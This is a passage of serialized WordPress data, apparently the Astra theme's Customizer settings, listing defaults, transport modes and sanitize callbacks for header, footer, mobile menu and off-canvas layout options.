ze_callback";b:0;}s:36:"astra-settings[header-desktop-items]";a:4:{s:7:"default";a:4:{s:5:"popup";a:1:{s:13:"popup_content";a:1:{i:0;s:11:"mobile-menu";}}s:5:"above";a:5:{s:10:"above_left";a:0:{}s:17:"above_left_center";a:0:{}s:12:"above_center";a:0:{}s:18:"above_right_center";a:0:{}s:11:"above_right";a:0:{}}s:7:"primary";a:5:{s:12:"primary_left";a:1:{i:0;s:4:"logo";}s:19:"primary_left_center";a:0:{}s:14:"primary_center";a:0:{}s:20:"primary_right_center";a:0:{}s:13:"primary_right";a:1:{i:0;s:6:"menu-1";}}s:5:"below";a:5:{s:10:"below_left";a:0:{}s:17:"below_left_center";a:0:{}s:12:"below_center";a:0:{}s:18:"below_right_center";a:0:{}s:11:"below_right";a:0:{}}}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:46:"astra-settings[header-desktop-draggable-items]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:35:"astra-settings[header-mobile-items]";a:4:{s:7:"default";a:4:{s:5:"popup";a:1:{s:13:"popup_content";a:1:{i:0;s:11:"mobile-menu";}}s:5:"above";a:3:{s:10:"above_left";a:0:{}s:12:"above_center";a:0:{}s:11:"above_right";a:0:{}}s:7:"primary";a:3:{s:12:"primary_left";a:1:{i:0;s:4:"logo";}s:14:"primary_center";a:0:{}s:13:"primary_right";a:1:{i:0;s:14:"mobile-trigger";}}s:5:"below";a:3:{s:10:"below_left";a:0:{}s:12:"below_center";a:0:{}s:11:"below_right";a:0:{}}}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:45:"astra-settings[header-mobile-draggable-items]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:41:"astra-settings[header-mobile-popup-items]";a:4:{s:7:"default";b:0;s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:47:"astra-settings[header-transparent-link-heading]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:39:"astra-settings[header-transparant-link]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:43:"astra-settings[hb-header-main-layout-width]";a:4:{s:7:"default";s:7:"content";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:52:"astra-settings[section-header-builder-layout-margin]";a:4:{s:7:"default";a:6:{s:7:"desktop";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:6:"tablet";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:6:"mobile";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:12:"desktop-unit";s:2:"px";s:11:"tablet-unit";s:2:"px";s:11:"mobile-unit";s:2:"px";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:27:"sanitize_responsive_spacing";}}s:40:"astra-settings[header-builder-pro-items]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:46:"section-footer-builder-layout-ast-context-tabs";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:30:"astra-settings[builder-footer]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:40:"astra-settings[footer-bg-obj-responsive]";a:4:{s:7:"default";a:3:{s:7:"desktop";a:9:{s:16:"background-color";s:0:"";s:16:"background-image";s:0:"";s:17:"background-repeat";s:6:"repeat";s:19:"background-position";s:13:"center center";s:15:"background-size";s:4:"auto";s:21:"background-attachment";s:6:"scroll";s:12:"overlay-type";s:0:"";s:13:"overlay-color";s:0:"";s:16:"overlay-gradient";s:0:"";}s:6:"tablet";a:9:{s:16:"background-color";s:0:"";s:16:"background-image";s:0:"";s:17:"background-repeat";s:6:"repeat";s:19:"background-position";s:13:"center center";s:15:"background-size";s:4:"auto";s:21:"background-attachment";s:6:"scroll";s:12:"overlay-type";s:0:"";s:13:"overlay-color";s:0:"";s:16:"overlay-gradient";s:0:"";}s:6:"mobile";a:9:{s:16:"background-color";s:0:"";s:16:"background-image";s:0:"";s:17:"background-repeat";s:6:"repeat";s:19:"background-position";s:13:"center center";s:15:"background-size";s:4:"auto";s:21:"background-attachment";s:6:"scroll";s:12:"overlay-type";s:0:"";s:13:"overlay-color";s:0:"";s:16:"overlay-gradient";s:0:"";}}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:52:"astra-settings[footer-bg-obj-responsive-description]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";s:0:"";}s:36:"astra-settings[footer-desktop-items]";a:4:{s:7:"default";a:3:{s:5:"above";a:5:{s:7:"above_1";a:0:{}s:7:"above_2";a:0:{}s:7:"above_3";a:0:{}s:7:"above_4";a:0:{}s:7:"above_5";a:0:{}}s:7:"primary";a:5:{s:9:"primary_1";a:0:{}s:9:"primary_2";a:0:{}s:9:"primary_3";a:0:{}s:9:"primary_4";a:0:{}s:9:"primary_5";a:0:{}}s:5:"below";a:5:{s:7:"below_1";a:1:{i:0;s:9:"copyright";}s:7:"below_2";a:0:{}s:7:"below_3";a:0:{}s:7:"below_4";a:0:{}s:7:"below_5";a:0:{}}}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:38:"astra-settings[footer-draggable-items]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:40:"astra-settings[footer-builder-pro-items]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:53:"astra-settings[section-footer-builder-layout-divider]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:53:"astra-settings[section-footer-builder-layout-padding]";a:4:{s:7:"default";a:6:{s:7:"desktop";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:6:"tablet";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:6:"mobile";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:12:"desktop-unit";s:2:"px";s:11:"tablet-unit";s:2:"px";s:11:"mobile-unit";s:2:"px";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:27:"sanitize_responsive_spacing";}}s:52:"astra-settings[section-footer-builder-layout-margin]";a:4:{s:7:"default";a:6:{s:7:"desktop";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:6:"tablet";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:6:"mobile";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:12:"desktop-unit";s:2:"px";s:11:"tablet-unit";s:2:"px";s:11:"mobile-unit";s:2:"px";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:27:"sanitize_responsive_spacing";}}s:45:"section-above-header-builder-ast-context-tabs";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:33:"astra-settings[hba-header-height]";a:4:{s:7:"default";a:3:{s:7:"desktop";i:50;s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:44:"astra-settings[hba-header-bg-obj-responsive]";a:4:{s:7:"default";a:3:{s:7:"desktop";a:9:{s:16:"background-color";s:7:"#ffffff";s:16:"background-image";s:0:"";s:17:"background-repeat";s:6:"repeat";s:19:"background-position";s:13:"center center";s:15:"background-size";s:4:"auto";s:21:"background-attachment";s:6:"scroll";s:12:"overlay-type";s:0:"";s:13:"overlay-color";s:0:"";s:16:"overlay-gradient";s:0:"";}s:6:"tablet";a:9:{s:16:"background-color";s:0:"";s:16:"background-image";s:0:"";s:17:"background-repeat";s:6:"repeat";s:19:"background-position";s:13:"center center";s:15:"background-size";s:4:"auto";s:21:"background-attachment";s:6:"scroll";s:12:"overlay-type";s:0:"";s:13:"overlay-color";s:0:"";s:16:"overlay-gradient";s:0:"";}s:6:"mobile";a:9:{s:16:"background-color";s:0:"";s:16:"background-image";s:0:"";s:17:"background-repeat";s:6:"repeat";s:19:"background-position";s:13:"center center";s:15:"background-size";s:4:"auto";s:21:"background-attachment";s:6:"scroll";s:12:"overlay-type";s:0:"";s:13:"overlay-color";s:0:"";s:16:"overlay-gradient";s:0:"";}}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:46:"astra-settings[hba-header-bottom-border-color]";a:4:{s:7:"default";s:7:"#eaeaea";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:20:"sanitize_alpha_color";}}s:36:"astra-settings[hba-header-separator]";a:4:{s:7:"default";i:1;s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:52:"astra-settings[section-above-header-builder-divider]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:52:"astra-settings[section-above-header-builder-padding]";a:4:{s:7:"default";a:6:{s:7:"desktop";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:6:"tablet";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:6:"mobile";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:12:"desktop-unit";s:2:"px";s:11:"tablet-unit";s:2:"px";s:11:"mobile-unit";s:2:"px";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:27:"sanitize_responsive_spacing";}}s:51:"astra-settings[section-above-header-builder-margin]";a:4:{s:7:"default";a:6:{s:7:"desktop";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:6:"tablet";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:6:"mobile";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:12:"desktop-unit";s:2:"px";s:11:"tablet-unit";s:2:"px";s:11:"mobile-unit";s:2:"px";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:27:"sanitize_responsive_spacing";}}s:66:"astra-settings[section-above-header-builder-visibility-responsive]";a:4:{s:7:"default";a:3:{s:7:"desktop";i:1;s:6:"tablet";i:1;s:6:"mobile";i:1;}s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:45:"section-below-header-builder-ast-context-tabs";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:33:"astra-settings[hbb-header-height]";a:4:{s:7:"default";a:3:{s:7:"desktop";i:60;s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:44:"astra-settings[hbb-header-bg-obj-responsive]";a:4:{s:7:"default";a:3:{s:7:"desktop";a:9:{s:16:"background-color";s:7:"#eeeeee";s:16:"background-image";s:0:"";s:17:"background-repeat";s:6:"repeat";s:19:"background-position";s:13:"center center";s:15:"background-size";s:4:"auto";s:21:"background-attachment";s:6:"scroll";s:12:"overlay-type";s:0:"";s:13:"overlay-color";s:0:"";s:16:"overlay-gradient";s:0:"";}s:6:"tablet";a:9:{s:16:"background-color";s:0:"";s:16:"background-image";s:0:"";s:17:"background-repeat";s:6:"repeat";s:19:"background-position";s:13:"center center";s:15:"background-size";s:4:"auto";s:21:"background-attachment";s:6:"scroll";s:12:"overlay-type";s:0:"";s:13:"overlay-color";s:0:"";s:16:"overlay-gradient";s:0:"";}s:6:"mobile";a:9:{s:16:"background-color";s:0:"";s:16:"background-image";s:0:"";s:17:"background-repeat";s:6:"repeat";s:19:"background-position";s:13:"center center";s:15:"background-size";s:4:"auto";s:21:"background-attachment";s:6:"scroll";s:12:"overlay-type";s:0:"";s:13:"overlay-color";s:0:"";s:16:"overlay-gradient";s:0:"";}}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:46:"astra-settings[hbb-header-bottom-border-color]";a:4:{s:7:"default";s:7:"#eaeaea";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:20:"sanitize_alpha_color";}}s:36:"astra-settings[hbb-header-separator]";a:4:{s:7:"default";i:1;s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:52:"astra-settings[section-below-header-builder-divider]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:52:"astra-settings[section-below-header-builder-padding]";a:4:{s:7:"default";a:6:{s:7:"desktop";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:6:"tablet";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:6:"mobile";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:12:"desktop-unit";s:2:"px";s:11:"tablet-unit";s:2:"px";s:11:"mobile-unit";s:2:"px";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:27:"sanitize_responsive_spacing";}}s:51:"astra-settings[section-below-header-builder-margin]";a:4:{s:7:"default";a:6:{s:7:"desktop";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:6:"tablet";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:6:"mobile";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:12:"desktop-unit";s:2:"px";s:11:"tablet-unit";s:2:"px";s:11:"mobile-unit";s:2:"px";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:27:"sanitize_responsive_spacing";}}s:66:"astra-settings[section-below-header-builder-visibility-responsive]";a:4:{s:7:"default";a:3:{s:7:"desktop";i:1;s:6:"tablet";i:1;s:6:"mobile";i:1;}s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:60:"astra-settings[astra-sidebar-widgets-header-widget-1-margin]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:27:"sanitize_responsive_spacing";}}s:75:"astra-settings[astra-sidebar-widgets-header-widget-1-visibility-responsive]";a:4:{s:7:"default";a:3:{s:7:"desktop";i:1;s:6:"tablet";i:1;s:6:"mobile";i:1;}s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:60:"astra-settings[astra-sidebar-widgets-header-widget-2-margin]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:27:"sanitize_responsive_spacing";}}s:75:"astra-settings[astra-sidebar-widgets-header-widget-2-visibility-responsive]";a:4:{s:7:"default";a:3:{s:7:"desktop";i:1;s:6:"tablet";i:1;s:6:"mobile";i:1;}s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:46:"section-header-mobile-trigger-ast-context-tabs";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:35:"astra-settings[header-trigger-icon]";a:4:{s:7:"default";s:4:"menu";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:46:"astra-settings[mobile-header-toggle-btn-style]";a:4:{s:7:"default";s:7:"minimal";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:40:"astra-settings[mobile-header-menu-label]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:46:"astra-settings[mobile-header-toggle-btn-color]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:20:"sanitize_alpha_color";}}s:46:"astra-settings[mobile-header-toggle-icon-size]";a:4:{s:7:"default";i:20;s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:49:"astra-settings[mobile-header-toggle-btn-bg-color]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:20:"sanitize_alpha_color";}}s:52:"astra-settings[mobile-header-toggle-btn-border-size]";a:4:{s:7:"default";a:4:{s:3:"top";i:1;s:5:"right";i:1;s:6:"bottom";i:1;s:4:"left";i:1;}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:49:"astra-settings[mobile-header-toggle-border-color]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:20:"sanitize_alpha_color";}}s:57:"astra-settings[mobile-header-toggle-border-radius-fields]";a:4:{s:7:"default";a:6:{s:7:"desktop";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:6:"tablet";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:6:"mobile";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:12:"desktop-unit";s:2:"px";s:11:"tablet-unit";s:2:"px";s:11:"mobile-unit";s:2:"px";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:27:"sanitize_responsive_spacing";}}s:60:"astra-settings[section-header-mobile-trigger-margin-divider]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:52:"astra-settings[section-header-mobile-trigger-margin]";a:4:{s:7:"default";a:6:{s:7:"desktop";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:6:"tablet";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:6:"mobile";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:12:"desktop-unit";s:2:"px";s:11:"tablet-unit";s:2:"px";s:11:"mobile-unit";s:2:"px";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:27:"sanitize_responsive_spacing";}}s:45:"astra-settings[mobile-header-label-font-size]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:45:"section-popup-header-builder-ast-context-tabs";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:34:"astra-settings[mobile-header-type]";a:4:{s:7:"default";s:8:"dropdown";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:32:"astra-settings[off-canvas-slide]";a:4:{s:7:"default";s:5:"right";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:49:"astra-settings[header-builder-menu-toggle-target]";a:4:{s:7:"default";s:4:"icon";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:50:"astra-settings[header-offcanvas-content-alignment]";a:4:{s:7:"default";s:10:"flex-start";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:37:"astra-settings[off-canvas-background]";a:4:{s:7:"default";a:9:{s:16:"background-color";s:7:"#ffffff";s:16:"background-image";s:0:"";s:17:"background-repeat";s:6:"repeat";s:19:"background-position";s:13:"center center";s:15:"background-size";s:4:"auto";s:21:"background-attachment";s:6:"scroll";s:12:"overlay-type";s:0:"";s:13:"overlay-color";s:0:"";s:16:"overlay-gradient";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:23:"sanitize_background_obj";}}s:38:"astra-settings[off-canvas-close-color]";a:4:{s:7:"default";s:7:"#3a3a3a";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:20:"sanitize_alpha_color";}}s:40:"astra-settings[off-canvas-inner-spacing]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:34:"astra-settings[off-canvas-padding]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:47:"section-primary-header-builder-ast-context-tabs";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:32:"astra-settings[hb-header-height]";a:4:{s:7:"default";a:3:{s:7:"desktop";i:80;s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:43:"astra-settings[hb-header-bg-obj-responsive]";a:4:{s:7:"default";a:3:{s:7:"desktop";a:9:{s:16:"background-color";s:7:"#ffffff";s:16:"background-image";s:0:"";s:17:"background-repeat";s:6:"repeat";s:19:"background-position";s:13:"center center";s:15:"background-size";s:4:"auto";s:21:"background-attachment";s:6:"scroll";s:12:"overlay-type";s:0:"";s:13:"overlay-color";s:0:"";s:16:"overlay-gradient";s:0:"";}s:6:"tablet";a:9:{s:16:"background-color";s:0:"";s:16:"background-image";s:0:"";s:17:"background-repeat";s:6:"repeat";s:19:"background-position";s:13:"center center";s:15:"background-size";s:4:"auto";s:21:"background-attachment";s:6:"scroll";s:12:"overlay-type";s:0:"";s:13:"overlay-color";s:0:"";s:16:"overlay-gradient";s:0:"";}s:6:"mobile";a:9:{s:16:"background-color";s:0:"";s:16:"background-image";s:0:"";s:17:"background-repeat";s:6:"repeat";s:19:"background-position";s:13:"center center";s:15:"background-size";s:4:"auto";s:21:"background-attachment";s:6:"scroll";s:12:"overlay-type";s:0:"";s:13:"overlay-color";s:0:"";s:16:"overlay-gradient";s:0:"";}}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:40:"astra-settings[hb-header-main-sep-color]";a:4:{s:7:"default";s:7:"#eaeaea";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:20:"sanitize_alpha_color";}}s:34:"astra-settings[hb-header-main-sep]";a:4:{s:7:"default";i:1;s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:54:"astra-settings[section-primary-header-builder-divider]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:54:"astra-settings[section-primary-header-builder-padding]";a:4:{s:7:"default";a:6:{s:7:"desktop";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:6:"tablet";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:6:"mobile";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:12:"desktop-unit";s:2:"px";s:11:"tablet-unit";s:2:"px";s:11:"mobile-unit";s:2:"px";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:27:"sanitize_responsive_spacing";}}s:53:"astra-settings[section-primary-header-builder-margin]";a:4:{s:7:"default";a:6:{s:7:"desktop";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:6:"tablet";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:6:"mobile";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:12:"desktop-unit";s:2:"px";s:11:"tablet-unit";s:2:"px";s:11:"mobile-unit";s:2:"px";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:27:"sanitize_responsive_spacing";}}s:68:"astra-settings[section-primary-header-builder-visibility-responsive]";a:4:{s:7:"default";a:3:{s:7:"desktop";i:1;s:6:"tablet";i:1;s:6:"mobile";i:1;}s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:40:"astra-settings[logo-title-settings-link]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:30:"title_tagline-ast-context-tabs";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:44:"astra-settings[title_tagline-margin-divider]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:36:"astra-settings[title_tagline-margin]";a:4:{s:7:"default";a:6:{s:7:"desktop";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:6:"tablet";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:6:"mobile";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:12:"desktop-unit";s:2:"px";s:11:"tablet-unit";s:2:"px";s:11:"mobile-unit";s:2:"px";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:27:"sanitize_responsive_spacing";}}s:51:"astra-settings[title_tagline-visibility-responsive]";a:4:{s:7:"default";a:3:{s:7:"desktop";i:1;s:6:"tablet";i:1;s:6:"mobile";i:1;}s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh